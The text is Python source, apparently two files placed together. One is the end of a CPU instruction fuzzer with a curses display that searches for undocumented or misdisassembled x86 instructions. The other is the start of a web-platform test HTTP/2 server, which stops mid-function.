if bytes_polled == sizeof(self.T.r):
self.T.ic = self.T.ic + 1
error = False
if self.T.r.valid:
if self.search_unk and not self.T.r.disas_known and self.T.r.signum != self.SIGILL:
error = True
if self.search_len and self.T.r.disas_known and self.T.r.disas_length != self.T.r.length:
error = True
if self.search_dis and self.T.r.disas_known \
and self.T.r.disas_length != self.T.r.length and self.T.r.signum != self.SIGILL:
error = True
if self.search_ill and self.T.r.disas_known and self.T.r.signum == self.SIGILL:
error = True
if error:
insn = cstr2py(self.T.r.raw_insn)[:self.T.r.length]
r = copy.deepcopy(self.T.r)
self.T.al.appendleft(r)
if insn not in self.T.ad:
if not self.low_mem:
self.T.ad[insn] = r
self.T.ac = self.T.ac + 1
if self.sync:
with open(SYNC, "a") as f:
f.write(result_string(insn, self.T.r))
else:
if self.injector.process.poll() is not None:
self.ts.run = False
break
class Gui:
TIME_SLICE = .01
GRAY_BASE = 50
TICK_MASK = 0xff
RATE_Q = 100
RATE_FACTOR = 1000
INDENT = 10
GRAYS = 50
BLACK = 1
WHITE = 2
BLUE = 3
RED = 4
GREEN = 5
COLOR_BLACK = 16
COLOR_WHITE = 17
COLOR_BLUE = 18
COLOR_RED = 19
COLOR_GREEN = 20
def __init__(self, ts, injector, tests, do_tick, disassembler=disas_capstone):
        self.ts = ts
self.injector = injector
self.T = tests
self.gui_thread = None
self.do_tick = do_tick
self.ticks = 0
self.last_ins_count = 0
self.delta_log = deque(maxlen=self.RATE_Q)
self.time_log = deque(maxlen=self.RATE_Q)
self.disas = disassembler
self.stdscr = curses.initscr()
curses.start_color()
# doesn't work
# self.orig_colors = [curses.color_content(x) for x in xrange(256)]
curses.use_default_colors()
curses.noecho()
curses.cbreak()
curses.curs_set(0)
self.stdscr.nodelay(1)
self.sx = 0
self.sy = 0
self.init_colors()
self.stdscr.bkgd(curses.color_pair(self.WHITE))
self.last_time = time.time()
def init_colors(self):
if curses.has_colors() and curses.can_change_color():
curses.init_color(self.COLOR_BLACK, 0, 0, 0)
curses.init_color(self.COLOR_WHITE, 1000, 1000, 1000)
curses.init_color(self.COLOR_BLUE, 0, 0, 1000)
curses.init_color(self.COLOR_RED, 1000, 0, 0)
curses.init_color(self.COLOR_GREEN, 0, 1000, 0)
# this will remove flicker, but gives boring colors
'''
self.COLOR_BLACK = curses.COLOR_BLACK
self.COLOR_WHITE = curses.COLOR_WHITE
self.COLOR_BLUE = curses.COLOR_BLUE
self.COLOR_RED = curses.COLOR_RED
self.COLOR_GREEN = curses.COLOR_GREEN
'''
for i in xrange(0, self.GRAYS):
curses.init_color(
self.GRAY_BASE + i,
i * 1000 / (self.GRAYS - 1),
i * 1000 / (self.GRAYS - 1),
i * 1000 / (self.GRAYS - 1)
)
curses.init_pair(
self.GRAY_BASE + i,
self.GRAY_BASE + i,
self.COLOR_BLACK
)
else:
self.COLOR_BLACK = curses.COLOR_BLACK
self.COLOR_WHITE = curses.COLOR_WHITE
self.COLOR_BLUE = curses.COLOR_BLUE
self.COLOR_RED = curses.COLOR_RED
self.COLOR_GREEN = curses.COLOR_GREEN
for i in xrange(0, self.GRAYS):
curses.init_pair(
self.GRAY_BASE + i,
self.COLOR_WHITE,
self.COLOR_BLACK
)
curses.init_pair(self.BLACK, self.COLOR_BLACK, self.COLOR_BLACK)
curses.init_pair(self.WHITE, self.COLOR_WHITE, self.COLOR_BLACK)
curses.init_pair(self.BLUE, self.COLOR_BLUE, self.COLOR_BLACK)
curses.init_pair(self.RED, self.COLOR_RED, self.COLOR_BLACK)
curses.init_pair(self.GREEN, self.COLOR_GREEN, self.COLOR_BLACK)
def gray(self, scale):
if curses.can_change_color():
return curses.color_pair(self.GRAY_BASE + int(round(scale * (self.GRAYS - 1))))
else:
return curses.color_pair(self.WHITE)
def box(self, window, x, y, w, h, color):
for i in xrange(1, w - 1):
window.addch(y, x + i, curses.ACS_HLINE, color)
window.addch(y + h - 1, x + i, curses.ACS_HLINE, color)
for i in xrange(1, h - 1):
window.addch(y + i, x, curses.ACS_VLINE, color)
window.addch(y + i, x + w - 1, curses.ACS_VLINE, color)
window.addch(y, x, curses.ACS_ULCORNER, color)
window.addch(y, x + w - 1, curses.ACS_URCORNER, color)
window.addch(y + h - 1, x, curses.ACS_LLCORNER, color)
window.addch(y + h - 1, x + w - 1, curses.ACS_LRCORNER, color)
def bracket(self, window, x, y, h, color):
for i in xrange(1, h - 1):
window.addch(y + i, x, curses.ACS_VLINE, color)
window.addch(y, x, curses.ACS_ULCORNER, color)
window.addch(y + h - 1, x, curses.ACS_LLCORNER, color)
def vaddstr(self, window, x, y, s, color):
for i in xrange(0, len(s)):
window.addch(y + i, x, s[i], color)
def draw(self):
try:
self.stdscr.erase()
# constants
left = self.sx + self.INDENT
top = self.sy
top_bracket_height = self.T.IL
top_bracket_middle = self.T.IL / 2
mne_width = 10
op_width = 45
raw_width = (16*2)
# render log bracket
self.bracket(self.stdscr, left - 1, top, top_bracket_height + 2, self.gray(1))
# render logo
self.vaddstr(self.stdscr, left - 3, top + top_bracket_middle - 5, "sand", self.gray(.2))
self.vaddstr(self.stdscr, left - 3, top + top_bracket_middle + 5, "sifter", self.gray(.2))
# refresh instruction log
synth_insn = cstr2py(self.T.r.raw_insn)
(mnemonic, op_str, size) = self.disas(synth_insn)
self.T.il.append(
(
mnemonic,
op_str,
self.T.r.length,
"%s" % hexlify(synth_insn)
)
)
# render instruction log
try:
for (i, r) in enumerate(self.T.il):
line = i + self.T.IL - len(self.T.il)
(mnemonic, op_str, length, raw) = r
if i == len(self.T.il) - 1:
# latest instruction
# mnemonic
self.stdscr.addstr(
top + 1 + line,
left,
"%*s " % (mne_width, mnemonic),
self.gray(1)
)
# operands
self.stdscr.addstr(
top + 1 + line,
left + (mne_width + 1),
"%-*s " % (op_width, op_str),
curses.color_pair(self.BLUE)
)
# bytes
if self.maxx > left + (mne_width + 1) + (op_width + 1) + (raw_width + 1):
self.stdscr.addstr(
top + 1 + line,
left + (mne_width + 1) + (op_width + 1),
"%s" % raw[0:length * 2],
self.gray(.9)
)
self.stdscr.addstr(
top + 1 +line,
left + (mne_width + 1) + (op_width + 1) + length * 2,
"%s" % raw[length * 2:raw_width],
self.gray(.3)
)
else:
# previous instructions
# mnemonic, operands
self.stdscr.addstr(
top + 1 + line,
left,
"%*s %-*s" % (mne_width, mnemonic, op_width, op_str),
self.gray(.5)
)
# bytes
if self.maxx > left + (mne_width + 1) + (op_width + 1) + (raw_width + 1):
self.stdscr.addstr(
top + 1 + line,
left + (mne_width + 1) + (op_width + 1),
"%s" % raw[0:length * 2],
self.gray(.3)
)
self.stdscr.addstr(
top + 1 + line,
left + (mne_width + 1) + (op_width + 1) + length * 2,
"%s" % raw[length * 2:raw_width],
self.gray(.1)
)
except RuntimeError:
# probably the deque was modified by the poller
pass
# rate calculation
self.delta_log.append(self.T.ic - self.last_ins_count)
self.last_ins_count = self.T.ic
ctime = time.time()
self.time_log.append(ctime - self.last_time)
self.last_time = ctime
rate = int(sum(self.delta_log)/sum(self.time_log))
# render timestamp
if self.maxx > left + (mne_width + 1) + (op_width + 1) + (raw_width + 1):
self.vaddstr(
self.stdscr,
left + (mne_width + 1) + (op_width + 1) + (raw_width + 1),
top + 1,
self.T.elapsed(),
self.gray(.5)
)
# render injection settings
self.stdscr.addstr(top + 1, left - 8, "%d" % self.injector.settings.root, self.gray(.1))
self.stdscr.addstr(top + 1, left - 7, "%s" % arch, self.gray(.1))
self.stdscr.addstr(top + 1, left - 3, "%c" % self.injector.settings.synth_mode, self.gray(.5))
# render injection results
self.stdscr.addstr(top + top_bracket_middle, left - 6, "v:", self.gray(.5))
self.stdscr.addstr(top + top_bracket_middle, left - 4, "%2x" % self.T.r.valid)
self.stdscr.addstr(top + top_bracket_middle + 1, left - 6, "l:", self.gray(.5))
self.stdscr.addstr(top + top_bracket_middle + 1, left - 4, "%2x" % self.T.r.length)
self.stdscr.addstr(top + top_bracket_middle + 2, left - 6, "s:", self.gray(.5))
self.stdscr.addstr(top + top_bracket_middle + 2, left - 4, "%2x" % self.T.r.signum)
self.stdscr.addstr(top + top_bracket_middle + 3, left - 6, "c:", self.gray(.5))
self.stdscr.addstr(top + top_bracket_middle + 3, left - 4, "%2x" % self.T.r.sicode)
# render instruction count
self.stdscr.addstr(top + top_bracket_height + 2, left, "#", self.gray(.5))
self.stdscr.addstr(top + top_bracket_height + 2, left + 2,
"%s" % (int_to_comma(self.T.ic)), self.gray(1))
# render rate
self.stdscr.addstr(top + top_bracket_height + 3, left,
" %d/s%s" % (rate, " " * min(rate / self.RATE_FACTOR, 100)), curses.A_REVERSE)
# render artifact count
self.stdscr.addstr(top + top_bracket_height + 4, left, "#", self.gray(.5))
self.stdscr.addstr(top + top_bracket_height + 4, left + 2,
"%s" % (int_to_comma(self.T.ac)), curses.color_pair(self.RED))
# render artifact log
if self.maxy >= top + top_bracket_height + 5 + self.T.UL + 2:
# render artifact bracket
self.bracket(self.stdscr, left - 1, top + top_bracket_height + 5, self.T.UL + 2, self.gray(1))
# render artifacts
try:
for (i, r) in enumerate(self.T.al):
y = top_bracket_height + 5 + i
insn_hex = hexlify(cstr2py(r.raw_insn))
# unexplainable hack to remove some of the unexplainable
# flicker on my console. a bug in ncurses? doesn't
# happen if using curses.COLOR_RED instead of a custom
# red. doesn't happen if using a new random string each
# time; doesn't happen if using a constant string each
# time. only happens with the specific implementation below.
#TODO: on systems with limited color settings, this
# makes the background look like random characters
random_string = ("%02x" % random.randint(0,100)) * (raw_width-2)
self.stdscr.addstr(top + 1 + y, left, random_string, curses.color_pair(self.BLACK))
self.stdscr.addstr(top + 1 + y, left + 1,
"%s" % insn_hex[0:r.length * 2], curses.color_pair(self.RED))
self.stdscr.addstr(top + 1 + y, left + 1 + r.length * 2,
"%s" % insn_hex[r.length * 2:raw_width], self.gray(.25))
except RuntimeError:
# probably the deque was modified by the poller
pass
self.stdscr.refresh()
except curses.error:
pass
def start(self):
self.gui_thread = threading.Thread(target=self.render)
self.gui_thread.start()
def stop(self):
self.gui_thread.join()
def checkkey(self):
c = self.stdscr.getch()
if c == ord('p'):
self.ts.pause = not self.ts.pause
elif c == ord('q'):
self.ts.run = False
elif c == ord('m'):
self.ts.pause = True
time.sleep(.1)
self.injector.stop()
self.injector.settings.increment_synth_mode()
self.injector.start()
self.ts.pause = False
def render(self):
while self.ts.run:
while self.ts.pause:
self.checkkey()
time.sleep(.1)
(self.maxy,self.maxx) = self.stdscr.getmaxyx()
self.sx = 1
self.sy = max((self.maxy + 1 - (self.T.IL + self.T.UL + 5 + 2))/2, 0)
self.checkkey()
synth_insn = cstr2py(self.T.r.raw_insn)
if synth_insn and not self.ts.pause:
self.draw()
if self.do_tick:
self.ticks = self.ticks + 1
if self.ticks & self.TICK_MASK == 0:
with open(TICK, 'w') as f:
f.write("%s" % hexlify(synth_insn))
time.sleep(self.TIME_SLICE)
def get_cpu_info():
with open("/proc/cpuinfo", "r") as f:
cpu = [l.strip() for l in f.readlines()[:7]]
return cpu
def dump_artifacts(r, injector, command_line):
global arch
tee = Tee(LOG, "w")
tee.write("#\n")
tee.write("# %s\n" % command_line)
tee.write("# %s\n" % injector.command)
tee.write("#\n")
tee.write("# insn tested: %d\n" % r.ic)
tee.write("# artf found: %d\n" % r.ac)
tee.write("# runtime: %s\n" % r.elapsed())
tee.write("# seed: %d\n" % injector.settings.seed)
tee.write("# arch: %s\n" % arch)
tee.write("# date: %s\n" % time.strftime("%Y-%m-%d %H:%M:%S"))
tee.write("#\n")
tee.write("# cpu:\n")
cpu = get_cpu_info()
for l in cpu:
tee.write("# %s\n" % l)
tee.write("# %s v l s c\n" % (" " * 28))
for k in sorted(list(r.ad)):
v = r.ad[k]
tee.write(result_string(k, v))
def cleanup(gui, poll, injector, ts, tests, command_line, args):
ts.run = False
if gui:
gui.stop()
if poll:
poll.stop()
if injector:
injector.stop()
'''
# doesn't work
if gui:
for (i, c) in enumerate(gui.orig_colors):
curses.init_color(i, c[0], c[1], c[2])
'''
    curses.nocbreak()
curses.echo()
curses.endwin()
dump_artifacts(tests, injector, command_line)
if args.save:
with open(LAST, "w") as f:
f.write(hexlify(cstr2py(tests.r.raw_insn)))
sys.exit(0)
def main():
global arch
def exit_handler(signal, frame):
cleanup(gui, poll, injector, ts, tests, command_line, args)
injector = None
poll = None
gui = None
command_line = " ".join(sys.argv)
parser = argparse.ArgumentParser()
parser.add_argument("--len", action="store_true", default=False,
help="search for length differences in all instructions (instructions\
that executed differently than the disassembler expected, or did not\
exist when the disassembler expected them to)"
)
parser.add_argument("--dis", action="store_true", default=False,
help="search for length differences in valid instructions (instructions\
that executed differently than the disassembler expected)"
)
parser.add_argument("--unk", action="store_true", default=False,
help="search for unknown instructions (instructions that the\
disassembler doesn't know about but successfully execute)"
)
parser.add_argument("--ill", action="store_true", default=False,
help="the inverse of --unk, search for invalid disassemblies\
(instructions that do not successfully execute but that the\
disassembler acknowledges)"
)
parser.add_argument("--tick", action="store_true", default=False,
help="periodically write the current instruction to disk"
)
parser.add_argument("--save", action="store_true", default=False,
help="save search progress on exit"
)
parser.add_argument("--resume", action="store_true", default=False,
help="resume search from last saved state"
)
parser.add_argument("--sync", action="store_true", default=False,
help="write search results to disk as they are found"
)
parser.add_argument("--low-mem", action="store_true", default=False,
help="do not store results in memory"
)
parser.add_argument("injector_args", nargs=argparse.REMAINDER)
args = parser.parse_args()
injector_args = args.injector_args
if "--" in injector_args: injector_args.remove("--")
if not args.len and not args.unk and not args.dis and not args.ill:
print("warning: no search type (--len, --unk, --dis, --ill) specified, results will not be recorded.")
raw_input()
if args.resume:
if "-i" in injector_args:
print("--resume is incompatible with -i")
sys.exit(1)
if os.path.exists(LAST):
with open(LAST, "r") as f:
insn = f.read()
injector_args.extend(['-i',insn])
else:
print("no resume file found")
sys.exit(1)
if not os.path.exists(OUTPUT):
os.makedirs(OUTPUT)
injector_bitness, errors = \
subprocess.Popen(
['file', INJECTOR],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE
).communicate()
arch = re.search(b".*(..)-bit.*", injector_bitness).group(1)
ts = ThreadState()
signal.signal(signal.SIGINT, exit_handler)
settings = Settings(args.injector_args)
tests = Tests()
injector = Injector(settings)
injector.start()
poll = Poll(ts, injector, tests, command_line, args.sync,
args.low_mem, args.unk, args.len, args.dis, args.ill)
poll.start()
gui = Gui(ts, injector, tests, args.tick)
gui.start()
while ts.run:
time.sleep(.1)
cleanup(gui, poll, injector, ts, tests, command_line, args)
if __name__ == '__main__':
main()
|
server.py
|
import errno
import http.server
import os
import socket
from socketserver import ThreadingMixIn
import ssl
import sys
import threading
import time
import traceback
import uuid
from collections import OrderedDict
from queue import Empty, Queue
from h2.config import H2Configuration
from h2.connection import H2Connection
from h2.events import RequestReceived, ConnectionTerminated, DataReceived, StreamReset, StreamEnded
from h2.exceptions import StreamClosedError, ProtocolError
from h2.settings import SettingCodes
from h2.utilities import extract_method_header
from urllib.parse import urlsplit, urlunsplit
from mod_pywebsocket import dispatch
from mod_pywebsocket.handshake import HandshakeException, AbortedByUserException
from . import routes as default_routes
from .config import ConfigBuilder
from .logger import get_logger
from .request import Server, Request, H2Request
from .response import Response, H2Response
from .router import Router
from .utils import HTTPException, isomorphic_decode, isomorphic_encode
from .constants import h2_headers
from .ws_h2_handshake import WsH2Handshaker
# We need to stress test that browsers can send/receive many headers (there is
# no specified limit), but the Python stdlib has an arbitrary limit of 100
# headers. Hitting the limit leads to HTTP 431, so we monkey patch it higher.
# https://bugs.python.org/issue26586
# https://github.com/web-platform-tests/wpt/pull/24451
import http.client
assert isinstance(getattr(http.client, '_MAXHEADERS'), int)
setattr(http.client, '_MAXHEADERS', 512)
"""
HTTP server designed for testing purposes.
The server is designed to provide flexibility in the way that
requests are handled, and to provide control both over exactly
what bytes are put on the wire for the response and over the
timing of sending those bytes.
The server is based on the stdlib HTTPServer, but with some
notable differences in the way that requests are processed.
Overall processing is handled by a WebTestRequestHandler,
which is a subclass of BaseHTTPRequestHandler. This is responsible
for parsing the incoming request. A RequestRewriter is then
applied and may change the request data if it matches a
supplied rule.
Once the request data has been finalised, Request and Response
objects are constructed. These are used by the other parts of the
system to read information about the request and manipulate the
response.
Each request is handled by a particular handler function. The
mapping between Request and the appropriate handler is determined
by a Router. By default handlers are installed to interpret files
under the document root with .py extensions as executable python
files (see handlers.py for the api for such files), .asis files as
bytestreams to be sent literally and all other files to be served
statically.
The handler functions are responsible for either populating the
fields of the response object, which will then be written when the
handler returns, or for directly writing to the output stream.
"""
class RequestRewriter(object):
def __init__(self, rules):
"""Object for rewriting the request path.
:param rules: Initial rules to add; a list of three item tuples
(method, input_path, output_path), defined as for
register()
"""
self.rules = {}
for rule in reversed(rules):
self.register(*rule)
self.logger = get_logger()
def register(self, methods, input_path, output_path):
"""Register a rewrite rule.
:param methods: Set of methods this should match. "*" is a
special value indicating that all methods should
be matched.
:param input_path: Path to match for the initial request.
:param output_path: Path to replace the input path with in
the request.
"""
if isinstance(methods, (bytes, str)):
methods = [methods]
self.rules[input_path] = (methods, output_path)
def rewrite(self, request_handler):
"""Rewrite the path in a BaseHTTPRequestHandler instance, if
it matches a rule.
:param request_handler: BaseHTTPRequestHandler for which to
rewrite the request.
"""
split_url = urlsplit(request_handler.path)
if split_url.path in self.rules:
methods, destination = self.rules[split_url.path]
if "*" in methods or request_handler.command in methods:
self.logger.debug("Rewriting request path %s to %s" %
(request_handler.path, destination))
new_url = list(split_url)
new_url[2] = destination
new_url = urlunsplit(new_url)
request_handler.path = new_url
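# Usage sketch (hypothetical rules): each rule is the (methods, input_path,
# output_path) tuple documented in register() above; "*" matches every method.
#   rewriter = RequestRewriter([
#       ("*", "/old/logo.png", "/new/logo.png"),
#       (["GET", "HEAD"], "/legacy.html", "/current.html"),
#   ])
#   rewriter.rewrite(request_handler)   # rewrites request_handler.path in place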
class WebTestServer(ThreadingMixIn, http.server.HTTPServer):
allow_reuse_address = True
acceptable_errors = (errno.EPIPE, errno.ECONNABORTED)
request_queue_size = 2000
# Ensure that we don't hang on shutdown waiting for requests
daemon_threads = True
def __init__(self, server_address, request_handler_cls,
router, rewriter, bind_address, ws_doc_root=None,
config=None, use_ssl=False, key_file=None, certificate=None,
encrypt_after_connect=False, latency=None, http2=False, **kwargs):
"""Server for HTTP(s) Requests
:param server_address: tuple of (server_name, port)
:param request_handler_cls: BaseHTTPRequestHandler-like class to use for
handling requests.
:param router: Router instance to use for matching requests to handler
functions
:param rewriter: RequestRewriter-like instance to use for preprocessing
requests before they are routed
:param config: Dictionary holding environment configuration settings for
handlers to read, or None to use the default values.
:param use_ssl: Boolean indicating whether the server should use SSL
:param key_file: Path to key file to use if SSL is enabled.
:param certificate: Path to certificate to use if SSL is enabled.
:param ws_doc_root: Document root for websockets
:param encrypt_after_connect: For each connection, don't start encryption
until a CONNECT message has been received.
This enables the server to act as a
self-proxy.
        :param bind_address: True to bind the server to both the IP address and
port specified in the server_address parameter.
False to bind the server only to the port in the
server_address parameter, but not to the address.
:param latency: Delay in ms to wait before serving each response, or
callable that returns a delay in ms
"""
self.router = router
self.rewriter = rewriter
self.scheme = "http2" if http2 else "https" if use_ssl else "http"
self.logger = get_logger()
self.latency = latency
if bind_address:
hostname_port = server_address
else:
hostname_port = ("",server_address[1])
http.server.HTTPServer.__init__(self, hostname_port, request_handler_cls, **kwargs)
if config is not None:
Server.config = config
else:
self.logger.debug("Using default configuration")
with ConfigBuilder(self.logger,
browser_host=server_address[0],
ports={"http": [self.server_address[1]]}) as config:
assert config["ssl_config"] is None
Server.config = config
self.ws_doc_root = ws_doc_root
self.key_file = key_file
self.certificate = certificate
self.encrypt_after_connect = use_ssl and encrypt_after_connect
if use_ssl and not encrypt_after_connect:
if http2:
ssl_context = ssl.create_default_context(purpose=ssl.Purpose.CLIENT_AUTH)
ssl_context.load_cert_chain(keyfile=self.key_file, certfile=self.certificate)
ssl_context.set_alpn_protocols(['h2'])
self.socket = ssl_context.wrap_socket(self.socket,
server_side=True)
else:
self.socket = ssl.wrap_socket(self.socket,
keyfile=self.key_file,
certfile=self.certificate,
server_side=True)
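    # Construction sketch (hypothetical host, port and certificate paths; the
    # router and rewriter are assumed to have been built as sketched above):
    #   server = WebTestServer(("127.0.0.1", 8000), Http2WebTestRequestHandler,
    #                          router, rewriter, bind_address=True,
    #                          use_ssl=True, key_file=key_path,
    #                          certificate=cert_path, http2=True)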
def handle_error(self, request, client_address):
error = sys.exc_info()[1]
if ((isinstance(error, OSError) and
isinstance(error.args, tuple) and
error.args[0] in self.acceptable_errors) or
(isinstance(error, IOError) and
error.errno in self.acceptable_errors)):
pass # remote hang up before the result is sent
else:
msg = traceback.format_exc()
self.logger.error("%s %s" % (type(error), error))
self.logger.info(msg)
class BaseWebTestRequestHandler(http.server.BaseHTTPRequestHandler):
"""RequestHandler for WebTestHttpd"""
def __init__(self, *args, **kwargs):
self.logger = get_logger()
http.server.BaseHTTPRequestHandler.__init__(self, *args, **kwargs)
def finish_handling_h1(self, request_line_is_valid):
self.server.rewriter.rewrite(self)
request = Request(self)
response = Response(self, request)
if request.method == "CONNECT":
self.handle_connect(response)
return
if not request_line_is_valid:
response.set_error(414)
response.write()
return
self.logger.debug("%s %s" % (request.method, request.request_path))
handler = self.server.router.get_handler(request)
self.finish_handling(request, response, handler)
def finish_handling(self, request, response, handler):
# If the handler we used for the request had a non-default base path
# set update the doc_root of the request to reflect this
if hasattr(handler, "base_path") and handler.base_path:
request.doc_root = handler.base_path
if hasattr(handler, "url_base") and handler.url_base != "/":
request.url_base = handler.url_base
if self.server.latency is not None:
if callable(self.server.latency):
latency = self.server.latency()
else:
latency = self.server.latency
self.logger.warning("Latency enabled. Sleeping %i ms" % latency)
time.sleep(latency / 1000.)
if handler is None:
self.logger.debug("No Handler found!")
response.set_error(404)
else:
try:
handler(request, response)
except HTTPException as e:
if 500 <= e.code < 600:
self.logger.warning("HTTPException in handler: %s" % e)
self.logger.warning(traceback.format_exc())
response.set_error(e.code, str(e))
except Exception as e:
self.respond_with_error(response, e)
self.logger.debug("%i %s %s (%s) %i" % (response.status[0],
request.method,
request.request_path,
request.headers.get('Referer'),
request.raw_input.length))
if not response.writer.content_written:
response.write()
        # If a python handler has been used, older handlers won't send an END_STREAM data frame, so this
# allows for backwards compatibility by accounting for these handlers that don't close streams
if isinstance(response, H2Response) and not response.writer.stream_ended:
response.writer.end_stream()
# If we want to remove this in the future, a solution is needed for
# scripts that produce a non-string iterable of content, since these
# can't set a Content-Length header. A notable example of this kind of
# problem is with the trickle pipe i.e. foo.js?pipe=trickle(d1)
if response.close_connection:
self.close_connection = True
if not self.close_connection:
# Ensure that the whole request has been read from the socket
request.raw_input.read()
def handle_connect(self, response):
self.logger.debug("Got CONNECT")
response.status = 200
response.write()
if self.server.encrypt_after_connect:
self.logger.debug("Enabling SSL for connection")
self.request = ssl.wrap_socket(self.connection,
keyfile=self.server.key_file,
certfile=self.server.certificate,
server_side=True)
self.setup()
return
def respond_with_error(self, response, e):
message = str(e)
if message:
err = [message]
else:
err = []
err.append(traceback.format_exc())
response.set_error(500, "\n".join(err))
class Http2WebTestRequestHandler(BaseWebTestRequestHandler):
protocol_version = "HTTP/2.0"
def handle_one_request(self):
"""
This is the main HTTP/2.0 Handler.
When a browser opens a connection to the server
        on the HTTP/2.0 port, the server enters this method, which initiates the h2 connection,
        keeps running throughout the duration of the interaction, and reads/writes directly
        from the socket.
Because there can be multiple H2 connections active at the same
time, a UUID is created for each so that it is easier to tell them apart in the logs.
"""
config = H2Configuration(client_side=False)
self.conn = H2ConnectionGuard(H2Connection(config=config))
self.close_connection = False
# Generate a UUID to make it easier to distinguish different H2 connection debug messages
self.uid = str(uuid.uuid4())[:8]
self.logger.debug('(%s) Initiating h2 Connection' % self.uid)
with self.conn as connection:
# Bootstrapping WebSockets with HTTP/2 specification requires
# ENABLE_CONNECT_PROTOCOL to be set in order to enable WebSocket
# over HTTP/2
new_settings = dict(connection.local_settings)
new_settings[SettingCodes.ENABLE_CONNECT_PROTOCOL] = 1
connection.local_settings.update(new_settings)
connection.local_settings.acknowledge()
connection.initiate_connection()
data = connection.data_to_send()
window_size = connection.remote_settings.initial_window_size
self.request.sendall(data)
# Dict of { stream_id: (thread, queue) }
stream_queues = {}
try:
while not self.close_connection:
data = self.request.recv(window_size)
                if data == b'':
self.logger.debug('(%s) Socket Closed' % self.uid)
self.close_connection = True
continue
with self.conn as connection:
frames = connection.receive_data(data)
window_size = connection.remote_settings.initial_window_size
self.logger.debug('(%s) Frames Received: ' % self.uid + str(frames))
for frame in frames:
if isinstance(frame, ConnectionTerminated):
self.logger.debug('(%s) Connection terminated by remote peer ' % self.uid)
self.close_connection = True
# Flood all the streams with connection terminated, this will cause them to stop
for stream_id, (thread, queue) in stream_queues.items():
queue.put(frame)
elif hasattr(frame, 'stream_id'):
if frame.stream_id not in stream_queues:
queue = Queue()
stream_queues[frame.stream_id] = (self.start_stream_thread(frame, queue), queue)
stream_queues[frame.stream_id][1].put(frame)
if isinstance(frame, StreamEnded) or (hasattr(frame, "stream_ended") and frame.stream_ended):
del stream_queues[frame.stream_id]
except OSError as e:
self.logger.error('(%s) Closing Connection - \n%s' % (self.uid, str(e)))
if not self.close_connection:
self.close_connection = True
except Exception as e:
self.logger.error('(%s) Unexpected Error - \n%s' % (self.uid, str(e)))
finally:
for stream_id, (thread, queue) in stream_queues.items():
queue.put(None)
thread.join()
def _is_extended_connect_frame(self, frame):
if not isinstance(frame, RequestReceived):
return False
method = extract_method_header(frame.headers)
if method != b"CONNECT":
return False
protocol = ""
for key, value in frame.headers:
if key in (b':protocol', u':protocol'):
protocol = isomorphic_encode(value)
break
if protocol != b"websocket":
raise ProtocolError("Invalid protocol %s with CONNECT METHOD" % (protocol,))
return True
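    # Illustrative header set that this check accepts (the extended CONNECT
    # handshake used to bootstrap WebSockets over HTTP/2); path and authority
    # here are hypothetical:
    #   (b':method', b'CONNECT'), (b':protocol', b'websocket'),
    #   (b':scheme', b'https'), (b':path', b'/echo'), (b':authority', b'example.test')
    # A non-CONNECT method returns False; for a CONNECT request, any :protocol
    # other than b"websocket" (including a missing one) raises ProtocolError.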
def start_stream_thread(self, frame, queue):
"""
This starts a new thread to handle frames for a specific stream.
:param frame: The first frame on the stream
:param queue: A queue object that the thread will use to check for new frames
:return: The thread object that has already been started
"""
if self._is_extended_connect_frame(frame):
target = Http2WebTestRequestHandler._stream_ws_thread
else:
target = Http2WebTestRequestHandler._stream_thread
t = threading.Thread(
target=target,
args=(self, frame.stream_id, queue)
)
t.start()
return t
def _stream_ws_thread(self, stream_id, queue):
frame = queue.get(True, None)
if frame is None:
return
rfile, wfile = os.pipe()
        rfile, wfile = os.fdopen(rfile, 'rb'), os.fdopen(wfile, 'wb', 0)  # needs to be unbuffered for websockets
stream_handler = H2HandlerCopy(self, frame, rfile)
h2request = H2Request(stream_handler)
h2response = H2Response(stream_handler, h2request)
dispatcher = dispatch.Dispatcher(self.server.ws_doc_root, None, False)
if not dispatcher.get_handler_suite(stream_handler.path):
h2response.set_error(404)
h2response.write()
return
request_wrapper = _WebSocketRequest(stream_handler, h2response)
handshaker = WsH2Handshaker(request_wrapper, dispatcher)
try:
handshaker.do_handshake()
except HandshakeException as e:
self.logger.info('Handshake failed for error: %s' % e)
h2response.set_error(e.status)
h2response.write()
return
except AbortedByUserException:
h2response.write()
return
# h2 Handshaker prepares the headers but does not send them down the
# wire. Flush the headers here.
try:
h2response.write_status_headers()
except StreamClosedError:
# work around https://github.com/web-platform-tests/wpt/issues/27786
# The stream was already closed.
return
request_wrapper._dispatcher = dispatcher
# we need two threads:
# - one to handle the frame queue
# - one to handle the request (dispatcher.transfer_data is blocking)
# the alternative is to have only one (blocking) thread. That thread
# will call transfer_data. That would require a special case in
# handle_one_request, to bypass the queue and write data to wfile
# directly.
t = threading.Thread(
target=Http2WebTestRequestHandler._stream_ws_sub_thread,
args=(self, request_wrapper, stream_handler, queue)
)
t.start()
while not self.close_connection:
try:
frame = queue.get(True, 1)
except Empty:
continue
if isinstance(frame, DataReceived):
wfile.write(frame.data)
if frame.stream_ended:
raise NotImplementedError("frame.stream_ended")
wfile.close()
elif frame is None or isinstance(frame, (StreamReset, StreamEnded, ConnectionTerminated)):
self.logger.debug('(%s - %s) Stream Reset, Thread Closing' % (self.uid, stream_id))
break
t.join()
def _stream_ws_sub_thread(self, request, stream_handler, queue):
dispatcher = request._dispatcher
try:
dispatcher.transfer_data(request)
except StreamClosedError:
# work around https://github.com/web-platform-tests/wpt/issues/27786
# The stream was already closed.
queue.put(None)
return
stream_id = stream_handler.h2_stream_id
with stream_handler.conn as connection:
try:
connection.end_stream(stream_id)
data = connection.data_to_send()
stream_handler.request.sendall(data)
except StreamClosedError: # maybe the stream has already been closed
pass
queue.put(None)
def _stream_thread(self, stream_id, queue):
"""
This thread processes frames for a specific stream. It waits for frames to be placed
in the queue, and processes them. When it receives a request frame, it will start processing
immediately, even if there are data frames to follow. One of the reasons for this is that it
can detect invalid requests before needing to read the rest of the frames.
"""
# The file-like pipe object that will be used to share data to request object if data is received
wfile = None
request = None
response = None
req_handler = None
while not self.close_connection:
try:
frame = queue.get(True, 1)
except Empty:
# Restart to check for close_connection
continue
self.logger.debug('(%s - %s) %s' % (self.uid, stream_id, str(frame)))
if isinstance(frame, RequestReceived):
rfile, wfile = os.pipe()
rfile, wfile = os.fdopen(rfile, 'rb'), os.fdopen(wfile, 'wb')
stream_handler = H2HandlerCopy(self, frame, rfile)
stream_handler.server.rewriter.rewrite(stream_handler)
request = H2Request(stream_handler)
response = H2Response(stream_handler, request)
req_handler = stream_handler.server.router.get_handler(request)
if hasattr(req_handler, "frame_handler"):
